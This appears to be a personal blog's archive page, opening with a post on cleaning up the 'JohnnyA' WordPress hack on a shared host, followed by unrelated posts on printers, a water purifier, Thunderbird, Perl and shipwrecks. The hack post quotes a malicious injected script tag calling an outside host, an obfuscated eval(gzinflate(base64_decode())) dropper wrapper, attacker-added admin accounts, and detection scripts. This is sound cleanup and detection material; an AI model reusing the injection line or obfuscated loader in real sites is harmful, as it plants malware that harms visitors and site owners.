JohnnyA Hack on MediaTemple grid server

Noticed malware warning messages thanks to Google Safe Browsing, when viewing several of my websites hosted on MediaTemple’s Grid Server (gs) account.

Did some searching & found it’s a widespread attack on MediaTemple. MediaTemple lets (gs) customers host up to 100 domains under one account for the low-low price of $20/month … pretty great, until you have to figure out the path of entry for a hacker.

Although thankfully so far it’s not actually destructive, the “JohnnyA” hack is a mess (like any good hack!):

  • Javascript files had malicious obfuscated code inserted at the top of the compromised files. For my site the hackers targeted the jQuery library, jQuery plugins (corner, impromptu, etc), & swfobject.js that came bundled in the cu3er WordPress theme.
  • PHP files of 5298 bytes were spread all throughout the site structure, named after PHP functions so they blend in: chmod.php, closedir.php, content.php, eregi.php, fclose.php, fopen.php, fwrite.php, is_file.php, is_writable.php …. all were located under html/ (not cgi-bin/) so they were especially easy to locate & delete.
  • WordPress default theme index.php & footer.php (someone else mentioned their header.php was also compromised) had malicious Javascript code added.
  • WordPress posts had malicious code added to the top:
    <h5><script src="http://maroon.karenegren.com/js/jquery.min.js"></script></h5>
  • WordPress databases had “johnnyA” & “WordPress” admin users added to the wp_users table, as well as entries under wp_usermeta with what looks like some sort of evil admin interface HTML/Javascript code. Here is my hacked WP users table (note that both added rows have a zero user_registered date, and the “WordPress” row carries a bare 32-character MD5 rather than a phpass “$P$” hash, which WordPress still accepts as a legacy password hash; both are consistent with rows inserted straight into the database rather than created through the application):
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    | ID | user_login | user_pass                          | user_nicename | user_email                | user_url | user_registered     | user_activation_key | user_status | display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    | 14 | johnnyA    | $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ | John          | sarkonerr@gmail.com       |          | 0000-00-00 00:00:00 |                     |           0 | John         |
    | 12 | WordPress  | 3e04a6d10c88e6f5818a2a4151f9a95c   | WordPress     | www@www.com               | www.com  | 0000-00-00 00:00:00 |                     |           0 | WordPress    |
    |  1 | admin      | [censored]                         | admin         | [censored]                | http://  | 2006-10-23 13:24:13 |                     |           0 | netscraps    |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+

Cleanup took awhile — see below. I also changed my MediaTemple AccountCenter password, my user (SSH/SFTP) account passwords, database passwords, moved all my WordPress installations off to a new, completely separate (not linked in AccountCenter) MediaTemple grid server account, & signed up for Sucuri’s website malware monitoring service …. because of all the recent hack problems, MediaTemple customers receive a discount. Great. Here’s hoping it catches any hacks before Google Safe Browsing does.

The posts below have a lot of information on various ways to scan for the compromised files but so far I haven’t seen anything definitive in terms of how to prevent this all from happening again. Definitely read the posted comments too:

Here are the steps I took to remove the exploits:

Find compromised Javascript files:

  • find . -name "*.js" -exec grep -l "gr0=0" {} \;
  • find . -name "*.js" -exec grep -l "this.n=3279;this.O=58441;" {} \;

… Both searches returned the same results for me. The evil Javascript was the top line of each file, very long mostly obfuscated code ending with var gr0=0; The evil top line didn’t have its own newline character at the end, so be careful not to remove the ENTIRE top line without checking first that you’re not removing legitimate code way at the end of the line.

Find evil PHP files:

  • grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
    This search looks for runs of 255 or more base64 characters & may show false positives (legitimate libraries sometimes embed long encoded blobs). Look for matches that look like:
    <?php $o = '[random characters here]';eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>
    The hex-escaped string is just eval(gzinflate(base64_decode($o))); spelled out byte by byte, so a naive grep for “eval(base64_decode” misses it; $o holds the compressed, base64-encoded payload.
  • Another way to check is:
    find . -name "*.php" -ctime -14
    …which lists .php files whose inode change time (ctime) is within the last 14 days. The leading minus matters: without it, -ctime 14 matches only files changed exactly 14 days ago. ctime is a better signal than mtime here because an attacker can backdate a file’s modification time with touch, but can’t backdate its ctime.
  • If the file is 5298 bytes, chances are the entire file is junk & you can delete it.
  • Otherwise if the file is something that was pre-existing (like WordPress theme header.php, index.php etc) you’ll have to edit it & remove the bad code by hand or better yet, replace the entire compromised file with a clean version from a backup or original distribution.
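The JS and PHP searches above, plus the careful first-line removal, as one added shell script (example code, not the original post’s commands). The marker strings are the ones quoted in this post; everything else is an assumption for the demo: the function names, the sample web root built by make_sample_tree, its file names (jquery.corner.js, fopen.php, etc.) and the stand-in “base64” blob of repeated A’s in the fake dropper. Run it with the argument demo to scan the constructed tree, or call scan_webroot against a real html/ directory.

```sh
#!/bin/sh
# Added example, not the original post's commands: scan a web root for the
# JohnnyA indicators quoted above (the "this.n=3279;this.O=58441;" and
# "var gr0=0;" JS markers, the hex-escaped eval() wrapper, 255+ character
# base64 runs and 5298-byte PHP files), and strip the injected JS prefix
# without eating legitimate code that shares the first line. The sample
# tree built by make_sample_tree is constructed for the demo; its file
# names and contents are assumptions, not the real payload.

JS_MARKERS='this\.n=3279;this\.O=58441;|var gr0=0;'

# JS files carrying either marker string from the post.
# "|| :" keeps a no-match exit status from aborting a "set -e" caller.
find_injected_js() {
  find "$1" -name '*.js' -exec grep -lE "$JS_MARKERS" {} + || :
}

# PHP files matching any of the three dropper indicators, de-duplicated.
find_dropper_php() {
  {
    find "$1" -name '*.php' -size 5298c || :
    grep -rlF --include='*.php' 'eval("\x' "$1" || :
    grep -rlE --include='*.php' '[A-Za-z0-9/+]{255,}' "$1" || :
  } | sort -u
}

# PHP files whose inode change time is within the last $2 days. Note the
# leading "-": "-ctime 14" alone matches files changed exactly 14 days ago.
find_recent_php() {
  find "$1" -name '*.php' -ctime "-$2"
}

# Remove only the injected prefix on line 1, up to and including the final
# "var gr0=0;" marker, so legitimate code on the same line survives. Writes
# via a temp file because "sed -i" differs between GNU and BSD sed.
strip_js_injection() {
  sed '1s/^.*var gr0=0;//' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Constructed sample web root (assumed names/contents) so this runs offline.
make_sample_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/html/js" "$root/html/wp-content/themes/default"
  # Injected plugin: payload is line 1 and the real code follows on the
  # SAME line with no newline in between, as the post describes.
  printf '%s%s\n' \
    'this.n=3279;this.O=58441;/*obfuscated*/var gr0=0;' \
    '(function($){$.fn.corner=function(){};})(jQuery);' \
    > "$root/html/js/jquery.corner.js"
  printf '%s\n' '(function($){$.fn.tidy=function(){};})(jQuery);' \
    > "$root/html/js/tidy.js"
  # Clean theme files.
  printf '%s\n' '<?php get_header(); ?>' > "$root/html/wp-content/themes/default/index.php"
  printf '%s\n' '<?php wp_footer(); ?>' > "$root/html/wp-content/themes/default/footer.php"
  # Fake dropper: hex-escaped eval wrapper plus a 300-char stand-in blob,
  # padded with spaces to exactly 5298 bytes like the files in the post.
  blob=$(awk 'BEGIN{for(i=0;i<300;i++)printf "A"}')
  hexeval='eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");'
  body="<?php \$o = '$blob';$hexeval ?>"
  pad=$((5298 - ${#body}))
  { printf '%s' "$body"; awk -v n="$pad" 'BEGIN{for(i=0;i<n;i++)printf " "}'; } \
    > "$root/html/fopen.php"
  printf '%s\n' "$root"
}

# Report all three indicator lists for a web root; review before deleting.
scan_webroot() {
  echo "== JS files with injected markers"; find_injected_js "$1"
  echo "== dropper-style PHP files";       find_dropper_php "$1"
  echo "== PHP files changed in last 14 days"; find_recent_php "$1" 14
}

if [ "${1-}" = demo ]; then
  root=$(make_sample_tree); scan_webroot "$root"; rm -rf "$root"
fi
```

The three PHP checks are deliberately kept separate in the report: the size and hex-eval matches are near-certain junk, while the ctime list only narrows the set of files worth diffing against a clean copy, and the long-base64 grep needs a human eye for false positives.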

Find evil WordPress users:

  • You’ll need MySQL access to your WordPress database for this. You are on your own there.
  • use dbxxxxxx_wp; (whatever your WordPress database is named)
  • select * from wp_users; (note the ID for all users you don’t recognize)
  • delete from wp_users where ID = 'xx'; (replace xx with the ID, & remember each one you delete)
  • delete from wp_usermeta where user_id = 'xx'; (do this once for each ID you deleted above; the injected admin-interface code lives in this table, so don’t skip it)

Find evil WordPress posts:

  • select post_content from wp_posts where post_content like '%<h5><script%';
  • update wp_posts set post_content = replace( post_content, "<h5>script here</h5>", ""); …run this once for each unique script found above, replacing “script here” with the actual script tag.
Posted in bugs, MediaTemple, mysql | 1 Comment

Scanning legal-size documents with the Canon MX860 ADF is needlessly complicated

Canon MX860: how to scan legal-size documents

Pound the Canon MX860 repeatedly with a gavel.

You’d think in this day & age of all-in-one printers, you could put a legal-size document in the document feeder (ADF) & scan away. Not so with the Canon MX860.

Out of the box, the MX860′s ADF will scan legal-size documents as a letter-size PDF with the bottom 3 inches cut off. Document length auto-detection with the ADF was apparently too complex for Canon engineers (?!)

Technically the MX860 can scan legal-size paper, but it’s a trick (“trick” meaning pain in the ass) if you typically use the handy buttons on the scanner for everything. Here’s how:

Load up the MX860′s desktop scanning software, which Canon cryptically called “MP Navigator EX” — mine opens up to a wizard-style screen. Select “Stack Of Documents (ADF)”, then click the “Specify…” button on the left-hand side & there you can temporarily change the PDF document size for the next ADF scan.

If you scan legal documents all the time & want to change the settings permanently: Click the “Preferences” button (top/right corner) & switch to the “Scanner Button Settings” tab. Then you can change the document settings for each one-click action. So for instance you could set the “Save to PC” action to scan a legal-size PDF & “Save to PDF” to scan in letter size.

Sounds needlessly complicated? It is, absolutely. Hopefully Canon will add automatic document length detection for the ADF in a future firmware/software update, but I wouldn’t count on it.

(Anyone know if this is fixed with the Canon MX870?)

Posted in bugs, tips | 2 Comments

Raising The Cheonan

Salvaging the South Korean corvette “Cheonan” is old news now that the US has a major ecological disaster to contend with, but these AP photos of the bow section being raised are pretty amazing. It’s hard to believe a world that has the technology to grab a sunken battleship off the seafloor after a few days can’t plug an itty bitty mile-deep runaway oil well any faster.

Posted in Machines Of Unusual Size, nautical disasters, photos | Leave a comment

Continuous Beeping from a Trojan UV Max C4

Continuous beeping from my Trojan UV Max C4

Our Trojan UVMax C4 water purifier started beeping continuously. The install date was April 2009, so it’s been a year — according to the manual, time to replace the UV bulb!

I dutifully ordered a new UV lamp ($90) & installed it. Wiping my hands in smug homeowner anticipation of what was sure to be the return of super clean water for my family, I plugged the C4 power supply back in… green lights all around… but the beeping didn’t stop.

I unplugged the unit, waited a bit, plugged it back in… more beeping. Pulled out the manual. The only mention of the beeping alarm is in the troubleshooting section, which refers you back to the Control Panel section, which has all kinds of useful information about the status lights but absolutely nothing about a beeping alarm.

The manual says there’s supposed to be a model-specific reference card stuck behind the power supply. Sure enough I could see the tab sticking up — I felt a wave of relief, as surely the reference card would have an answer to The Meaning Of The Incessant Beep.

Nope. No mention of an audible alarm whatsoever.

By now I could feel a beeping-induced headache. Putting my hope in the Internet for a solution, I ran upstairs to the computer. Sure enough, the top result had the answer (thanks, Google) — but it wasn’t from the Trojan UVMax website — a random reseller had taken the time to post the answer … Apparently TrojanUV produced defective C4 power supply units between January 2009 – January 2010. Yep, a whole year of defective units. But although they’re now four months into people discovering the problem, there’s nothing about it on their website. No notice, no press release, nothing (or am I just not seeing it?)

The solution is to contact Trojan for a replacement power supply. In the meantime, I’m stuck with choosing between unsafe drinking water or constant beeping.

So in review:

  1. There is nothing in the Trojan UV Max manual about what the beeping alarm means,
  2. There is no way to silence the beeping alarm,
  3. The Trojan UV website lacks any information about this year-long manufacturing defect.

Just to make life a little harder, the email link on the Trojan UV Max support website (Viqua) goes nowhere.

I called their customer service line & the rep I spoke with knew about the C4 problem right away. Apparently they had mistakenly installed firmware for the “Plus” version — which has a reset button to silence the alarm — into the “regular” C4 units, which don’t.

I asked the rep if the replacement C4 power supply was shipping via overnight express. He mumbled something to the effect that I should have it “within a day or two”. However it’s been 3 days & I still don’t have the replacement Trojan UV Max C4 power supply, so it’s becoming clear that Trojan doesn’t care enough to ship these via overnight or 2-day mail.

By now I’ve lost count how many ways Trojan UV customer service has completely failed their customers.

UPDATE (1/21/11): Still no note about this defect on their website. Even a simple note on their Support page, like “C4 Beeping? Click here to contact tech support” would be far more helpful to their customers than nothing at all. However in the 8 months since I originally posted this, Viqua has fixed their website contact links so they actually work, so that’s one step in the right direction! Seems that people have had better success by calling Viqua though.

Posted in awful customer service, bugs, tips | 22 Comments

Thunderbird ignores Windows’ default printer setting

I bought a new printer, a Canon MX860. As all-in-one printers go, it’s fantastic. Soon it was knighted as my new Windows’ default printer.

Everything was happy in Printerland until I tried to print an email from Thunderbird. Thunderbird kept selecting my old printer — I had left the old printer driver installed — and each time I had to change the printer back to my new Canon. Granted, that’s a pretty minor annoyance, but let enough minor annoyances pass you by & soon they get together & storm the castle.

Turns out Thunderbird stores its own default printer setting & if it’s set, the Windows default printer gets completely ignored. Worse, Thunderbird’s default printer setting is about as hidden as it gets:

  1. Tools menu -> Options -> Advanced -> General tab -> Config Editor button
  2. filter the list by typing “printer” in the Filter box (top of the screen)
  3. find the “print.print_printer” setting (who names these settings, anyway?)
  4. right-click & click “Reset”.

That does the trick!

Posted in bugs, tips | Tagged , , , | 18 Comments

Prototype mismatch: sub main::head ($) vs none

Turns out that when you use the LWP::Simple & CGI modules together in a Perl script, each has a conflicting head() function that throws that error. Who knew? Everyone who took the time to read the CAVEAT note at the end of the LWP::Simple docs, apparently:

Note that if you are using both LWP::Simple and the very popular CGI.pm module, you may be importing a head function from each module, producing a warning like “Prototype mismatch: sub main::head ($) vs none”. Get around this problem by just not importing LWP::Simple’s head function, like so:

use LWP::Simple qw(!head);
use CGI qw(:standard);  # then only CGI.pm defines a head()

Then if you do need LWP::Simple’s head function, you can just call it as LWP::Simple::head($url).

Posted in bugs, perl | Leave a comment

The Cougar Ace tips over, Alaska

The Cougar Ace is well-known for setting a Canadian record for most vehicles unloaded from a single ship, and also for a shipping disaster that once again caught my attention primarily because of the amazing Coast Guard photos. Like the Selendang Ayu disaster, the Cougar Ace became disabled off the Aleutian Islands, Alaska — this time though, the problem was a 60-degree list due to a ballast handling mistake. Wired has a pretty amazing writeup about the salvage operation. Click photos for the full-size versions.

MV Cougar Ace
Aug. 8, 2006: towed to safer waters in Wide Bay, Aleutian Islands

MV Cougar Ace
Aug. 10, 2006: still waiting to be righted, Wide Bay, Aleutian Islands

Posted in nautical disasters | Leave a comment

Resize script in Paint Shop Pro X2

PSP X2 resize script

I batch-process-resized some photos in PSP X2, & realized too late (after I had emailed 90 photos off to various relatives) that everyone appeared a little taller & thinner than they normally are. Not so bad right? Except that headshots look a little weird. The photos were taken with different cameras with slightly different aspect ratios.

So here’s an easy way to batch process/resize photos with a PSP X2 script, each to their correct aspect ratio (fixed width, variable height):

  • Open any one image.
  • File, Script, Start recording … resize the image.
  • File, Script, Save recording … save it under your scripts folder, which is generally Documents/My PSP Files/Scripts-Restricted/
  • File, Script, Edit.. browse to your scripts folder & select the resize script that you just saved.
  • click the Text Editor button
  • delete or comment out (# in front of the line) the ‘Height’ AND ‘AspectRatio’ lines. Setting them both to None works too. Make sure ‘MaintainAspectRatio’ is set to True.
  • Save & enjoy not looking warped.
Posted in graphics, paint shop pro, tips | Leave a comment

The birth of an island near Tonga

the birth of an island

The yacht Maiken witnessed the birth of a new island near Tonga. Some pretty amazing photos, a sea of floating stone & the volcanic island rising up out of the water.

Posted in world | 1 Comment

Windsurfing, late fall in Vermont

Wick windsurfing jump

Normally the National Weather Service tends to downgrade the weekend wind forecast the closer it gets to Friday afternoon.

Not so in the late fall — the forecasts just keep getting better & better, or for all the non-windsurfers, worse & worse! Also you would think the local NWS office would just give up on the Ultraviolet Index after mid-October. It’s nice of them to clarify which category a “1″ rating is in.

.THE LAKE CHAMPLAIN OPEN WATERS FORECAST…

…A LAKE WIND ADVISORY TODAY AND TONIGHT…

.TODAY…SOUTHEAST WINDS 25 TO 35 KNOTS WITH GUSTS TO 45 KNOTS POSSIBLE. WAVES 3 TO 5 FEET AND LOCALLY HIGHER. RAIN…HEAVY AT TIMES….BRIEFLY MIXED WITH SLEET OR SNOW AT THE ONSET. VISIBILITY 1 TO 3 MILES IN PRECIPITATION.
.TONIGHT…SOUTHWEST WINDS 15 TO 30 KNOTS. WAVES 2 TO 3 FEET. OCCASIONAL RAIN. VISIBILITY REDUCED TO 3 TO 5 MILES AT TIMES.
.SUNDAY…SOUTHWEST TO WEST WINDS 25 TO 35 KNOTS WITH HIGHER GUSTS POSSIBLE. WAVES 3 TO 4 FEET. SCATTERED RAIN SHOWERS. VISIBILITY REDUCED TO 2 TO 4 MILES AT TIMES.

THE LAKE CHAMPLAIN LAKE LEVEL AT THE KING STREET FERRY DOCK IN BURLINGTON WAS 96.80 FEET…AND THE WATER TEMPERATURE WAS 49 DEGREES.

THE ULTRAVIOLET INDEX FOR SATURDAY OCTOBER 28 IS A 1. THIS IS IN THE LOW CATEGORY.

SATURDAY UPDATE: Usually when the NWS forecasts wind 25-35 knots “with gusts to 45 knots”, they’re not this wrong:

White's Beach wind graph

So .. far less wind than forecast in the morning .. followed by a quick 90-degree switch & even lighter breeze in the afternoon .. then another quick 180-degree switch. Finally the promised wind shows up, well after sunset.

West Dennis wind graph

West Dennis beach (Cape Cod) had a much better day: consistent 35-40 mph with a very gradual direction shift from SSE to SSW. This typifies the difference between coastal & Lake Champlain surfing conditions.

Vermont keeps everyone guessing, professional forecasters included.

Posted in windsurfing | Leave a comment